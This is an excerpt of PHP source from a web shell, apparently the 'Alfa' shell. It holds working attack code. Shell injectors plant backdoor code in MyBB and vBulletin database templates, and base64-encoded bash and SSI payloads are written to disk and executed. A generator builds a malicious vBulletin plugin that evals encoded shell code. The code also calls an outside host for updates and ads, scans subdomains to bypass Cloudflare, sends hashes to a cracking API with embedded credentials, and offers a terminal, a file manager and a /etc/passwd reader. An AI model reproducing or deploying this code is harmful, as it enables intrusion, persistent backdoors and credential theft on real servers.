\'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix : \', \'inputName\' => \'prefix\', \'id\'=>\'db_prefix\',\'inputValue\' => \'mybb_\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho $selector;\r\necho "<p><input type=submit value=\' \'></p></form></center></center>";\r\nif(isset($_POST[\'alfa6\'])) {\r\n$dbu = $_POST[\'alfa6\'];\r\n$dbn = $_POST[\'alfa7\'];\r\n$dbp = $_POST[\'alfa8\'];\r\n$dbh = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$method = $_POST[\'alfa4\'];\r\n$shellCode = "{\\${".ALFA_UPLOADER."}}";\r\n$newinshell = str_replace("\'","\\\'",$shellCode);\r\nif (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){\r\n$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));\r\n$inject = "select template from {$prefix}templates where  title= \'calendar\'";\r\n$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));\r\n$GetTemp = mysqli_fetch_assoc($result);\r\n$saveDate = $GetTemp[\'template\'];\r\n$repsave = str_replace($shellCode,"",$saveDate);\r\n$repsave = str_replace("\'","\\\'",$repsave);\r\n$createShell = "update {$prefix}templates SET template= \'".$newinshell.$repsave."\' where title = \'calendar\'";\r\n$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));\r\n$geturl = "select value from {$prefix}settings where name= \'bburl\'";\r\n$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));\r\n$rowb = mysqli_fetch_assoc($findurl);\r\n$furl = $rowb[\'value\'];\r\n$realurl = parse_url($furl,PHP_URL_HOST);\r\n$realpath = parse_url($furl,PHP_URL_PATH);\r\n$res = false;\r\n$AlfaCurl = new AlfaCURL();\r\nif (extension_loaded(\'sockets\') && function_exists(\'fsockopen\') && $method == \'auto\' ){\r\nif ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){\r\n@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\\r\\n");\r\n@fputs($fsock, "HOST: $realurl\\r\\n");\r\n@fputs($fsock, "Connection: close\\r\\n\\r\\n");\r\n$check = fgets($fsock);\r\nif(preg_match("/200 OK/i",$check)){\r\n$repairdbtemp = "update {$prefix}templates SET template= \'$repsave\' where title = \'calendar\'";\r\n$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}\r\n@fclose($fsock);}}elseif(function_exists(\'curl_version\') && $method == \'auto\'){\r\n$AlfaCurl->Send($realurl.$realpath."/calendar.php");\r\n$res = true;\r\n}\r\nif($res){\r\n$ff = \'http://\'.$realurl.$realpath."/solevisible.php";\r\noutput($ff);\r\n}else{\r\n$ff = \'http://\'.$realurl.$realpath."/calendar.php";\r\n$fff = \'http://\'.$realurl.$realpath."/solevisible.php";\r\necho "<br><pre id=\'strOutput\' style=\'margin-top:5px\' class=\'ml1\'><br><center><b><font color=\'#FFFFFF\'>Please Go To Target => </font><a href=\'".$ff."\' target=\'_blank\'>".$ff."</a><br/><font color=\'#FFFFFF\'>And Go To => </font><a href=\'".$fff."\' target=\'_blank\'>".$fff."</a></b></center><br><br>";\r\n}}}}\r\nif(isset($_POST[\'alfa3\']) && $_POST[\'alfa3\']== \'vb\'){\r\nAlfaNum(1,2,7,9,10);\r\necho __pre().\'<p><div class="txtfont_header">| vbulletin |</div></p><p>\'.getConfigHtml(\'vb\').\'</p><form name="frm" method="POST" onsubmit="g(\\\'ShellInjectors\\\',null,null,this.lo.value,\\\'vb\\\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Host : \', \'inputName\' => \'lo\', \'id\'=>\'db_host\',\'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'DataBase Name : \', \'inputName\' => \'db\', \'id\'=>\'db_name\',\'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'User Name : \', \'inputName\' => \'user\', \'id\'=>\'db_user\',\'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Password : \', \'inputName\' => \'pass\', \'id\'=>\'db_pw\',\'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix : \', \'inputName\' => \'tab\', \'id\'=>\'db_prefix\',\'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho $selector;\r\necho \'<p><input type="submit" value=" " /></p></form></center>\';\r\nif(isset($_POST[\'alfa4\'])&&!empty($_POST[\'alfa4\'])){\r\n$method = $_POST[\'alfa8\'];\r\n$faq_name = "faq";\r\n$faq_file = "/faq.php";\r\n$code = "{\\${".ALFA_UPLOADER."}}{\\${exit()}}&";\r\n$conn=@mysqli_connect($_POST[\'alfa2\'],$_POST[\'alfa4\'],$_POST[\'alfa5\'],$_POST[\'alfa7\']) or die(@mysqli_connect_error());\r\n$rec = "select `template` from ".$_POST[\'alfa6\']."template WHERE title =\'".$faq_name."\'";\r\n$recivedata = @mysqli_query($conn,$rec);\r\n$getd = @mysqli_fetch_assoc($recivedata);\r\n$savetoass = $getd[\'template\'];\r\nif(empty($savetoass)){\r\n\t$faq_name = "header";\r\n\t$faq_file = "/";\r\n\t$rec = "select `template` from ".$_POST[\'alfa6\']."template WHERE title =\'".$faq_name."\'";\r\n\t$recivedata = @mysqli_query($conn,$rec);\r\n\t$getd = @mysqli_fetch_assoc($recivedata);\r\n\t$savetoass = $getd[\'template\'];\r\n\t$code = ALFA_UPLOADER.";";\r\n}\r\n$code = str_replace("\'","\\\'",$code);\r\n$p = "UPDATE ".$_POST[\'alfa6\']."template SET `template`=\'".$code."\' WHERE `title`=\'".$faq_name."\'";\r\n$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));\r\n$geturl = @mysqli_query($conn,"select `value` from ".$_POST[\'alfa6\']."setting WHERE `varname`=\'bburl\'");\r\n$getval = @mysqli_fetch_assoc($geturl);\r\n$saveval = $getval[\'value\'];\r\nif($faq_name == "header"){\r\n\tif(substr($saveval, -5, 5) == "/core"){\r\n\t\t$saveval = substr($saveval, 0, -5);\r\n\t}\r\n}\r\n$realurl = parse_url($saveval,PHP_URL_HOST);\r\n$realpath = parse_url($saveval,PHP_URL_PATH);\r\n$res = false;\r\n$AlfaCurl = new AlfaCURL();\r\nif(extension_loaded(\'sockets\') && function_exists(\'fsockopen\') && $method == \'auto\'){\r\nif($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){\r\n@fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\\r\\n");\r\n@fputs($fsock, "HOST: $realurl\\r\\n");\r\n@fputs($fsock, "Connection: close\\r\\n\\r\\n");\r\n$check = fgets($fsock);\r\nif(preg_match("/200 OK/i",$check)){\r\n$p1 = "UPDATE ".$_POST[\'alfa6\']."template SET template =\'".mysqli_real_escape_string($conn,$savetoass)."\' WHERE title =\'".$faq_name."\'";\r\n$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));\r\n$res = true;\r\n}\r\n@fclose($fsock);\r\n}\r\n}elseif(function_exists(\'curl_version\') && $method == \'auto\'){\r\n$AlfaCurl->Send($realurl.$realpath.$faq_file);\r\n$p1 = "UPDATE ".$_POST[\'alfa6\']."template SET template =\'".mysqli_real_escape_string($conn,$savetoass)."\' WHERE title =\'".$faq_name."\'";\r\n$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));\r\n$res = true;\r\n}\r\nif($res){\r\n$ff = \'http://\'.$realurl.$realpath."/solevisible.php";\r\noutput($ff);\r\n}else{\r\n$ff = \'http://\'.$realurl.$realpath.$faq_file;\r\n$fff = \'http://\'.$realurl.$realpath."/solevisible.php";\r\necho "<center><p><font color=\\"#FFFFFF\\">First Open This Link => </font><a href=\'".$ff."\' target=\'_blank\'>".$ff."</a><br/><font color=\\"#FFFFFF\\">Second Open This Link => </font><a href=\'".$fff."\' target=\'_blank\'>".$fff."</a></center></p>";}}}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfacheckfiletype(){\r\n\t$path = $_POST[\'path\'];\r\n\t$arg = $_POST[\'arg\'];\r\n\tif(@is_file($path.\'/\'.$arg)){\r\n\t\techo("file");\r\n\t}else{\r\n\t\techo("dir");\r\n\t}\r\n}\r\nfunction alfacheckupdate(){\r\n\tif($GLOBALS["DB_NAME"]["cgi_api"]){\r\n\t\tif(!isset($_COOKIE["alfacgiapi_mode"])&&!isset($_COOKIE["alfacgiapi"])){\r\n\t\t\t_alfa_cgicmd("whoami","perl",true);\r\n\t\t\tif(strlen(alfaEx("whoami",false,true))>0){\r\n\t\t\t\t__alfa_set_cookie("alfa_canruncmd", "true");\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(function_exists("curl_version")){\r\n\t\t$update = new AlfaCURL();\r\n\t\t$json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);\r\n\t\t$json = @json_decode($json,true);\r\n\t\t$data = array();\r\n\t\tif($json){\r\n\t\t\tif(!isset($_COOKIE[\'alfa_checkupdate\']) && !empty($json["type"])){\r\n\t\t\t\tif($json["type"] == "update"){\r\n\t\t\t\t\tif(__ALFA_VERSION__ != $json[\'version\'] || __ALFA_UPDATE__ != $json[\'version_number\']){\r\n\t\t\t\t\t\t@setcookie("alfa_checkupdate", "1", time()+86400);\r\n\t\t\t\t\t\t$data["content"] = \'<div class="update-holder">\'.$json["content"].\'</div>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif(isset($json["ads"]) && !empty($json["ads"])){\r\n\t\t\t\t$data["content"] .= $json["ads"];\r\n\t\t\t}\r\n\t\t\tif(isset($json["copyright"]) && !empty($json["copyright"])){\r\n\t\t\t\t$data["copyright"] = $json["copyright"];\r\n\t\t\t}\r\n\t\t\tif(isset($json["solevisible"]) && !empty($json["solevisible"])){\r\n\t\t\t\t$data["solevisible"] = $json["solevisible"];\r\n\t\t\t}\r\n\t\t\tif(isset($json["code_name"]) && !empty($json["code_name"])){\r\n\t\t\t\t$data["code_name"] = $json["code_name"];\r\n\t\t\t\t$data["version_number"] = __ALFA_VERSION__;\r\n\t\t\t}\r\n\t\t\tif(isset($json["market"]) && !empty($json["market"])){\r\n\t\t\t\t$data["market"] = $json["market"];\r\n\t\t\t}\r\n\t\t\techo @json_encode($data);\r\n\t\t}\r\n\t}\r\n}\r\nfunction alfaWriteTocgiapi($name, $source){\r\n\t$temp = "";\r\n\t$not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");\r\n\tif(in_array($name, $not_api)){\r\n\t\t$temp = ALFA_TEMPDIR;\r\n\t\tif($temp){\r\n\t\t\t@chdir($temp);\r\n\t\t}\r\n\t}else{\r\n\t\talfaCreateParentFolder();\r\n\t\t@chdir($GLOBALS[\'home_cwd\'] . "/" . __ALFA_DATA_FOLDER__);\r\n\t}\r\n\t@mkdir(\'alfacgiapi\',0755);\r\n\t__write_file("alfacgiapi/".$name, __get_resource($source));\r\n\t@chmod("alfacgiapi/".$name, 0755);\r\n\treturn $temp;\r\n}\r\nfunction alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}\r\nfunction alfaupdateheader(){\r\n\tif(!isset($_COOKIE["updateheader_data"])){\r\n\t\t$bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";\r\n\t\t$realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));\r\n\t\t$tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);\r\n\t\t$data = alfaEx("cd \'{$tmp_path}/alfacgiapi\';sh getheader.alfa",false,true,true);\r\n\t\tif(@is_array(@json_decode($data,true))){\r\n\t\t\t__alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data));\r\n\t\t\techo $data;\r\n\t\t}\r\n\t}else{\r\n\t\techo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]);\r\n\t}\r\n}\r\nfunction alfassiShell(){\r\nalfahead();\r\necho \'<div class=header>\';\r\nalfaCreateParentFolder();\r\n@chdir($GLOBALS[\'home_cwd\'] . "/" . __ALFA_DATA_FOLDER__);\r\n@mkdir(\'alfa_shtml\',0755);\r\n@chdir(\'alfa_shtml\');\r\nalfacgihtaccess(\'shtml\');\r\n$code = \'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==\';\r\n@__write_file(\'alfa_ssi.shtml\',__get_resource($code));\r\n@chmod("alfa_ssi.shtml",0755);\r\necho AlfaiFrameCreator(\'alfa_shtml/alfa_ssi.shtml\');\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfacloudflare(){\r\nalfahead();\r\nAlfaNum(8,9,10,7,6,5,4,3);\r\necho "<div class=header><center><br><div class=\'txtfont_header\'>| Cloud Flare ByPasser |</div><br><form action=\'\' onsubmit=\\"g(\'cloudflare\',null,this.url.value,\'>>\'); return false;\\" method=\'post\'>\r\n<p><div class=\'txtfont\'>Target:</div> <input type=\'text\' size=30 name=\'url\' style=\'text-align:center;\' placeholder=\\"target.com\\"> <input type=\'submit\' name=\'go\' value=\' \' /></p></form></center>";\r\nif($_POST[\'alfa2\'] && $_POST[\'alfa2\'] == \'>>\'){\r\n$url = $_POST[\'alfa1\'];\r\nif(!preg_match(\'/^(https?):\\/\\/(w{3}|w3)\\./i\', $url)){\r\n$url = preg_replace(\'/^(https?):\\/\\//\', \'\', $url);\r\n$url = "http://www.".$url;\r\n}\r\n$headers = @get_headers($url, 1);\r\n$server = $headers[\'Server\'];\r\n$subs = array(\'owa.\',\'2tty.\',\'m.\',\'gw.\',\'mx1.\',\'store.\',\'1\',\'2\',\'vb.\',\'news.\',\'download.\',\'video\',\'cpanel.\', \'ftp.\', \'server1.\', \'cdn.\', \'cdn2.\', \'ns.\', \'ns3.\', \'mail.\', \'webmail.\', \'direct.\', \'direct-connect.\', \'record.\', \'ssl.\', \'dns.\', \'help.\', \'blog.\', \'irc.\', \'forum.\', \'dl.\', \'my.\', \'cp.\', \'portal.\', \'kb.\', \'support.\',\'search.\', \'docs.\', \'files.\', \'accounts.\', \'secure.\', \'register.\', \'apps.\', \'beta.\', \'demo.\', \'smtp.\', \'ns2.\', \'ns1.\', \'server.\', \'shop.\', \'host.\', \'web.\', \'cloud.\', \'api.\', \'exchange.\', \'app.\', \'vps.\', \'owa.\', \'sat.\', \'bbs.\', \'movie.\', \'music.\', \'art.\', \'fusion.\', \'maps.\', \'forums.\', \'acc.\', \'cc.\', \'dev.\', \'ww42.\', \'wiki.\', \'clients.\', \'client.\',\'books.\',\'answers.\',\'service.\',\'groups.\',\'images.\',\'upload.\',\'up.\',\'tube.\',\'users.\',\'admin.\',\'administrator.\',\'private.\',\'design.\',\'whmcs.\',\'wp.\',\'wordpress.\',\'joomla.\',\'vbulletin.\',\'test.\',\'developer.\',\'panel.\',\'contact.\');\r\nif(preg_match(\'/^(https?):\\/\\/(w{3}|w3)\\./i\', $url, $matches)){\r\nif($matches[2] != \'www\'){$url = preg_replace(\'/^(https?):\\/\\//\', \'\', $url);}else{\r\n$url = explode($matches[0], $url);\r\n$url = $url[1];}}\r\nif(is_array($server))$server = $server[0];\r\necho __pre();\r\nif(preg_match(\'/cloudflare/i\', $server))\r\necho "\\n[+] CloudFlare detected: {$server}\\n<br>";\r\nelse\r\necho "\\n[+] CloudFlare wasn\'t detected, proceeding anyway.\\n";\r\necho \'[+] CloudFlare IP: \' . is_ipv4(gethostbyname($url)) . "\\n\\n<br><br>";\r\necho "[+] Searching for more IP addresses.\\n\\n<br><br>";\r\nfor($x=0;$x<count($subs);$x++){\r\n$site = $subs[$x] . $url;\r\n$ip = is_ipv4(gethostbyname($site));\r\nif($ip == \'(Null)\')\r\ncontinue;\r\necho "Trying {$site}: {$ip}\\n<br>";\r\n}\r\necho "\\n[+] Finished.\\n<br>";\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction is_ipv4($ip){\r\nreturn filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : \'(Null)\';\r\n}\r\nfunction __alert($s){\r\necho \'<center>\'.__pre().$s.\'</center>\';\r\n}\r\nfunction create_table($data){\r\necho \'<table border="1">\';\r\nforeach ($data as $key => $val){\r\n$array = array();\r\nforeach($val as $k => $v){\r\n$array[$k] = $v;\r\n}\r\necho "<tr><td><div class=\'tbltxt\'>".$array[\'tdName\']."</div></td><td><input type=\'text\' id=\'".$array[\'id\']."\' name=\'".$array[\'inputName\']."\' ".($array[\'placeholder\']?\'placeholder\':\'value\')."=\'".$array[\'inputValue\']."\' size=\'".$array[\'inputSize\']."\' ".($array[\'disabled\']?\'disabled\':\'\')."></td></tr>";\r\n}\r\necho \'</table>\';\r\n}\r\nfunction alfaphp2xml(){\r\nalfahead();\r\nAlfaNum(8,9,10,7,6,5,4,3);\r\necho "<div class=header><center><p><div class=\'txtfont_header\'>| Shell For vBulletin |</div></p><form onsubmit=\\"g(\'php2xml\',null,this.code.value,\'>>\'); return false;\\" method=\'post\'>\r\n<p><br><textarea rows=\'12\' cols=\'70\' type=\'text\' name=\'code\' placeholder=\\"insert your shell code\\"></textarea><br/><br/>\r\n<input type=\'submit\' name=\'go\' value=\' \' /></p></form></center>";\r\nif($_POST[\'alfa2\']&&$_POST[\'alfa2\']==\'>>\'){\r\necho __pre()."<p><center><textarea rows=\'10\' name=\'users\' cols=\'80\'>";\r\necho \'<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\\\'PHP_SELF\\\'],"subscriptions.php")){eval(base64_decode(\\\'\'.__ZW5jb2Rlcg($_POST[\'alfa1\']).\'\\\'));exit;}]]></phpcode></plugin></plugins>\';\r\necho \'</textarea></center></p>\';\r\n}\r\necho \'</center></div>\';\r\nalfafooter();\r\n}\r\nfunction alfacpcrack(){\r\nalfahead();\r\necho \'<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\\\'cpcrack\\\',null,\\\'dec\\\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\\\'cpcrack\\\',null,\\\'analyzer\\\')">| Hash Analyzer | </a></h3></center>\';\r\nif($_POST[\'alfa1\']==\'dec\'){\r\n$algorithms = array(\'md5\'=>\'MD5\',\'md4\'=>\'MD4\',\'sha1\'=>\'SHA1\',\'sha256\'=>\'SHA256\',\'sha384\'=>\'SHA384\',\'sha512\'=>\'SHA512\',\'ntlm\'=>\'NTLM\');\r\necho \'<center><div class="txtfont_header">| DeCrypter |</div><br><br>\r\n<form onsubmit="g(\\\'cpcrack\\\',null,\\\'dec\\\',this.md5.value,\\\'>>\\\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">\';\r\nforeach($algorithms as $key=>$val){echo(\'<option value="\'.$key.\'">\'.$val.\'</option>\');}\r\necho\'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>\';\r\nif($_POST[\'alfa3\'] == \'>>\'){\r\n$hash = $_POST[\'alfa2\'];\r\nif(!empty($hash)){\r\n$hash_type = $_POST[\'alfa4\'];\r\n$email = "solevisible@gmail.com";\r\n$code = "7b9fa79f92c3cd96";\r\n$target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;\r\n$resp = @file_get_contents($target);\r\nif($resp==\'\'){\r\n$get = new AlfaCURL();\r\n$resp = $get->Send($target);\r\n}\r\necho __pre().\'<center>\';\r\nswitch($resp){\r\n\tcase(\'CODE ERREUR : 001\'):echo "<b><font color=\'red\'>You exceeded the 400 allowed request per day</font></b>";break;\r\n\tcase(\'CODE ERREUR : 003\'):echo "<b><font color=\'red\'>Your request includes more than 400 hashes.</font></b>";break;\r\n\tcase(\'CODE ERREUR : 004\'):echo "<b><font color=\'red\'>The type of hash you provide in the argument hash_type doesn\'t seem to be valid</font></b>";break;\r\n\tcase(\'CODE ERREUR : 005\'):echo "<b><font color=\'red\'>The hash you provide doesn\'t seem to match with the type of hash you set.</font></b>";break;\r\n}\r\nif(substr($resp,0,4)!=\'CODE\'&&$resp!=\'\'){\r\necho "<b>Result: <font color=\'green\'>".$resp."</font></b>";\r\n}elseif(substr($resp,0,4)!=\'CODE\'){\r\necho "<font color=\'red\'>NoT Found</font><br />";\r\n}\r\necho(\'</center>\');\r\n}\r\n}\r\n}\r\nif($_POST[\'alfa1\']==\'analyzer\'){\r\necho \'<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>\r\n<form onsubmit="g(\\\'cpcrack\\\',null,\\\'analyzer\\\',this.hash.value,\\\'>>\\\');return false;">\r\n<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>\';\r\nif($_POST[\'alfa3\'] == \'>>\'){\r\n$hash = $_POST[\'alfa2\'];\r\nif(!empty($hash)){\r\n$curl = new AlfaCURL();\r\n$resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");\r\necho(__pre().\'<center>\');\r\nif(preg_match(\'#<fieldset class="trouve">(.*?)</fieldset>#\',$resp,$s)){\r\n\techo(\'<font color="green">\'.$s[1].\'</font>\');\r\n}else{\r\n\techo(\'<font color="red">Not Found...!</font>\');\r\n}\r\necho(\'</center><br>\');\r\n}\r\n}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfafooter(){\r\nif(!isset($_POST[\'ajax\'])){\r\necho "<table class=\'foot\' width=\'100%\' border=\'0\' cellspacing=\'3\' cellpadding=\'0\' >\r\n<tr>\r\n<td width=\'17%\'><form onsubmit=\\"if(this.f.value.trim().length==0)return false;editor(this.f.value,\'mkfile\',\'\',\'\',\'\',\'file\');this.f.value=\'\';return false;\\"><span class=\'footer_text\'>Make File : </span><br><input class=\'dir\' type=\'text\' name=\'f\' value=\'\'> <input type=\'submit\' value=\' \'></form></td>\r\n<td width=\'21%\'><form onsubmit=\\"g(\'FilesMan\',null,\'mkdir\',this.d.value);this.d.value=\'\';return false;\\"><span class=\'footer_text\'>Make Dir : </span><br><input class=\'dir\' type=\'text\' name=\'d\' value=\' \'> <input type=\'submit\' value=\' \'></form></td>\r\n<td width=\'22%\'><form onsubmit=\\"g(\'FilesMan\',null,\'delete\',this.del.value);this.del.value=\'\';return false;\\"><span class=\'footer_text\'>Delete : </span><br><input class=\'dir\' type=\'text\' name=\'del\' value=\' \'> <input type=\'submit\' value=\' \'></form></td>\r\n<td width=\'19%\'><form onsubmit=\\"if(this.f.value.trim().length==0)return false;editor(this.f.value,\'chmod\',\'\',\'\',\'\',\'none\');this.f.value=\'\';return false;\\"><span class=\'footer_text\'>Chmod : </span><br><input class=\'dir\' type=text name=f value=\' \'> <input type=\'submit\' value=\' \'></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\'2\'><form onsubmit=\'g(\\"FilesMan\\",this.c.value,\\"\\");return false;\'><span class=\'footer_text\'>Change Dir : </span><br><input class=\'foottable\' id=\'footer_cwd\' type=\'text\' name=\'c\' value=\'".htmlspecialchars($GLOBALS[\'cwd\'])."\'> <input type=\'submit\' value=\' \'></form></td>\r\n<td colspan=\'2\'><form onsubmit=\\"editor(this.file.value,\'view\',\'\',\'\',\'\',\'file\');return false;\\"><span><span class=\'footer_text\'>Read File : </span></span><br><input class=\'foottable\' type=\'text\' name=\'file\' value=\'/etc/passwd\'> <input type=\'submit\' value=\' \'></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\'4\'><form style=\'margin-top: 10px;\' onsubmit=\\"return false;\\" autocomplete=\'off\'><span><span class=\'footer_text\'>Execute :</span><br><button onClick=\'alfaOpenPhpTerminal();return false;\' class=\'foottable alfa_custom_cmd_btn\'><img style=\'width:28px;vertical-align: middle;\' src=\'http://solevisible.com/icons/menu/terminal.svg\'> Terminal</button><br></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\'4\'><form onsubmit=\'u(this);return false;\' name=\'footer_form\' method=\'post\' ENCTYPE=\'multipart/form-data\'>\r\n<input type=\'hidden\' name=\'a\' value=\'FilesMAn\'>\r\n<input type=\'hidden\' name=\'c\' value=\'" . $GLOBALS[\'cwd\'] ."\'>\r\n<input type=\'hidden\' name=\'ajax\' value=\'true\'>\r\n<input type=\'hidden\' name=\'alfa1\' value=\'uploadFile\'>\r\n<input type=\'hidden\' name=\'charset\' value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>\r\n<span class=\'footer_text\'>Upload file: </span><span><button id=\'addup\' onclick=\'addnewup();return false;\'><b>+</b></button></span><p id=\'pfooterup\'><label class=\'inputfile\' for=\'footerup\'><span id=\'__fnameup\'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id=\'footerup\' class=\'toolsInp\' type=\'file\' name=\'f[]\' onChange=\'handleup(this,0);\' multiple></p><input type=\'submit\' name=\'submit\' value=\' \'></form><div id=\'alfa-copyright\'><span class=\'copyright\'>[ ./AlfaTeam &copy; 2012-".date(\'Y\')." ]</span><br><span><a href=\'javascript:void(0);\' onclick=\'alert(\\"BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo\\");\' style=\'color: #E91E63;text-decoration: 